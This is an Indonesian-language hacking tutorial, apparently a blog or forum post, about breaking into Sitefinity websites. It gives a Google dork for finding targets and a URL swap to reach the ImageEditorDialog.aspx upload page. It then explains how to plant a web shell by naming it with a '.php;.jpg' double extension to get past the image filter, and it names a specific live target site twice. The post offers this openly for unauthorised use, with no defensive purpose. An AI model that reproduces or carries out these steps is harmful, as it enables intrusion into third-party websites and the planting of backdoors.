Pertama buka browser kamu gan ,, buka situs google ..
masukan Dork dibahah ini :
"Sitefinity: Login"
(Dork kembangin sendiri)nah jika udah maka akan banyak noh web2 yang akan muncul ,,
nah setelah itu tinggal klik yang kira2nya vuln gan
tinggal masukin exploitnya gan ,,
nah kalo misalkan web yang agan klik http://target.anu/Sitefinity/login
replace menjadi
http://target.anu/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Live target : www.usaim.edu/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
Live target : www.usaim.edu/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
nah kalo vuln bakal muncul gambar kek gini nih :
nah entar ada tombol "Select" klik aja gan terus pilih file yang mau diupload ,, kalo mau nanem shell nama shellnya di anu jadi namashell.php;.jpg ,, nah biasanya sih gituh ,, atau pake tampar2an ,, ane gak tau pasti lah :3 hahaha.
kal udah ready tinggal klik tombol "Upload this images"
sip !! tinggal cek filenya ke upload atau nggak ,,
cek filenya misal : http://target.anu/images/filekamu
SEMOGA BERMANFAAT